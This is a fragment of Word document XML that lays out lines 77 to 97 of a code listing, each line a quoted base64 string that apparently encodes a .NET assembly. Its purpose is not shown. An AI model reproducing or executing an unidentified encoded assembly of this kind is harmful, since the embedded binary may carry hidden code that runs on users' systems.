        <w:t>"AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAM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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>kF"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4Q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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>YG"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4I"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IB"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AG"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgP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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EB"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>84</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FW"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgD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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>oD"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPw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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AG"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4I"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADg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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FW"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgN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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CW"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eg"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>92</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhh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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>g+"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>kA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>YA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BB"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
